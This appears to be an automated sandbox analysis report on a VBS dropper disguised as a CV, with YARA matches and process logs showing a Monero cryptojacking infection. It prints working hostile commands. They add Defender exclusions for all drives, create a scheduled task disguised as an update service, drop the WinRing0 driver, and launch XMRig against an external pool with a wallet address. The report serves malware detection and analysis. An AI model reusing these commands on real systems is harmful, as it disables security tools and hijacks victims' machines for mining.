Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: Detects Monero mining software Author: Florian Roth (Nextron Systems)
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth (Nextron Systems)
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: Detects coinmining malware Author: ditekSHen
Wscript called in batch mode (surpress errors)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: L5n6SjMwbK03L5.ShellExecute L5H79SnDOdcL5,L5x1dZCrNL5,"","runas",0
Source: Initial file: L5n6SjMwbK03L5.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34), "", "runas", 1
Detected potential crypto function
Source: C:\Users\Public\7g.exe Code function: 11_2_003F3F02 11_2_003F3F02
Source: C:\Users\Public\7g.exe Code function: 11_2_00418250 11_2_00418250
Source: C:\Users\Public\7g.exe Code function: 11_2_00414238 11_2_00414238
Source: C:\Users\Public\7g.exe Code function: 11_2_003C8374 11_2_003C8374
Source: C:\Users\Public\7g.exe Code function: 11_2_0040C3C0 11_2_0040C3C0
Source: C:\Users\Public\7g.exe Code function: 11_2_0041C3D0 11_2_0041C3D0
Source: C:\Users\Public\7g.exe Code function: 11_2_0040C520 11_2_0040C520
Source: C:\Users\Public\7g.exe Code function: 11_2_004225BA 11_2_004225BA
Source: C:\Users\Public\7g.exe Code function: 11_2_003DE64C 11_2_003DE64C
Source: C:\Users\Public\7g.exe Code function: 11_2_004226A1 11_2_004226A1
Source: C:\Users\Public\7g.exe Code function: 11_2_003CA6D7 11_2_003CA6D7
Source: C:\Users\Public\7g.exe Code function: 11_2_003FC7CC 11_2_003FC7CC
Source: C:\Users\Public\7g.exe Code function: 11_2_003CA8A6 11_2_003CA8A6
Source: C:\Users\Public\7g.exe Code function: 11_2_0041E9D0 11_2_0041E9D0
Source: C:\Users\Public\7g.exe Code function: 11_2_0040AA30 11_2_0040AA30
Source: C:\Users\Public\7g.exe Code function: 11_2_00406A90 11_2_00406A90
Source: C:\Users\Public\7g.exe Code function: 11_2_00414B70 11_2_00414B70
Source: C:\Users\Public\7g.exe Code function: 11_2_0041EBA9 11_2_0041EBA9
Source: C:\Users\Public\7g.exe Code function: 11_2_003CCC1E 11_2_003CCC1E
Source: C:\Users\Public\7g.exe Code function: 11_2_00410DF9 11_2_00410DF9
Source: C:\Users\Public\7g.exe Code function: 11_2_00414E90 11_2_00414E90
Source: C:\Users\Public\7g.exe Code function: 11_2_00413110 11_2_00413110
Source: C:\Users\Public\7g.exe Code function: 11_2_004191D0 11_2_004191D0
Source: C:\Users\Public\7g.exe Code function: 11_2_00413190 11_2_00413190
Source: C:\Users\Public\7g.exe Code function: 11_2_004152C0 11_2_004152C0
Source: C:\Users\Public\7g.exe Code function: 11_2_0041D2D0 11_2_0041D2D0
Source: C:\Users\Public\7g.exe Code function: 11_2_00417290 11_2_00417290
Source: C:\Users\Public\7g.exe Code function: 11_2_003B537F 11_2_003B537F
Source: C:\Users\Public\7g.exe Code function: 11_2_003F9348 11_2_003F9348
Source: C:\Users\Public\7g.exe Code function: 11_2_004213A0 11_2_004213A0
Source: C:\Users\Public\7g.exe Code function: 11_2_003B9436 11_2_003B9436
Source: C:\Users\Public\7g.exe Code function: 11_2_00411410 11_2_00411410
Source: C:\Users\Public\7g.exe Code function: 11_2_0041D480 11_2_0041D480
Source: C:\Users\Public\7g.exe Code function: 11_2_003B1572 11_2_003B1572
Source: C:\Users\Public\7g.exe Code function: 11_2_0040B5B0 11_2_0040B5B0
Java / VBScript file with very long strings (likely obfuscated code)
Source: curriculum_vitae-copie.vbs Initial sample: Strings found which are bigger than 50
Creates driver files
Source: C:\Users\Public\7g.exe File created: C:\Users\Public\WindowsUpdate\WinRing0x64.sys Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\WindowsUpdate\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Yara signature match
Source: 11.3.7g.exe.3a0ca00.3.raw.unpack, type: UNPACKEDPE Matched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.3.7g.exe.35b7600.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 11.3.7g.exe.3580000.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 19.0.mservice.exe.7ff7a0a50000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000011.00000002.868028749.0000022E67CE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000013.00000002.992637368.000001854050B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000000B.00000003.815621184.0000000001480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000019.00000003.898659213.000001FFE094A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000018.00000002.898732843.000001DBC7705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000017.00000003.880754735.000001E320A92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000016.00000002.880872368.000001959AF15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000013.00000002.992637368.0000018540500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 00000019.00000003.898567720.000001FFE0943000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.898525051.000001FFE093A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: 00000013.00000000.863918261.00007FF7A0D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 0000000B.00000003.817222736.0000000003580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: Process Memory Space: 7g.exe PID: 5428, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 4860, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth (Nextron Systems), description = Detects mining pool protocol string in Executable, nodeepdive = , score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26
Source: Process Memory Space: mservice.exe PID: 3476, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 4620, type: MEMORYSTR Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: wscript.exe PID: 6596, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 6548, type: MEMORYSTR Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: wscript.exe PID: 6712, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: Process Memory Space: wscript.exe PID: 6860, type: MEMORYSTR Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\Public\WindowsUpdate\mservice.vbs, type: DROPPED Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: C:\Users\Public\WindowsUpdate\WinRing0x64.sys, type: DROPPED Matched rule: PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n date = 2023-05-19, author = Florian Roth, description = Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin, score = , reference = https://github.com/magicsword-io/LOLDrivers, hash = a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth (Nextron Systems), description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-11-10
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth (Nextron Systems), description = Detects command line parameters often used by crypto mining software, score = , reference = https://www.poolwatch.io/coin/monero
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth (Nextron Systems), description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: C:\Users\Public\WindowsUpdate\mservice.exe, type: DROPPED Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Found potential string decryption / allocating functions
Source: C:\Users\Public\7g.exe Code function: String function: 003B1E40 appears 118 times
Source: C:\Users\Public\7g.exe Code function: String function: 0041F1B0 appears 394 times
Contains functionality to communicate with device drivers
Source: C:\Users\Public\7g.exe Code function: 11_2_003B81D9: __EH_prolog,DeviceIoControl, 11_2_003B81D9
Enables security privileges
Source: C:\Users\Public\7g.exe Process token adjusted: Security Jump to behavior
Source: go.exe.11.dr Static PE information: Section: UPX1 ZLIB complexity 0.993395475414692
Source: C:\Windows\System32\wscript.exe File created: C:\Users\Public\computer_7 Jump to behavior
Source: WinRing0x64.sys.11.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.evad.mine.winVBS@29/17@2/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
Source: curriculum_vitae-copie.vbs Virustotal: Detection: 10%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\curriculum_vitae-copie.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" "C:\Users\user\Desktop\curriculum_vitae-copie.vbs
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z
Source: C:\Users\Public\7g.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"
Source: unknown Process created: C:\Windows\System32\wscript.exe wscript.exe C:\Users\Public\windowsupdate\mservice.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
Source: C:\Users\Public\WindowsUpdate\mservice.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\Public\WindowsUpdate\mservice.vbs" //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l: Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7z Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xml Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologo Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml" Jump to behavior
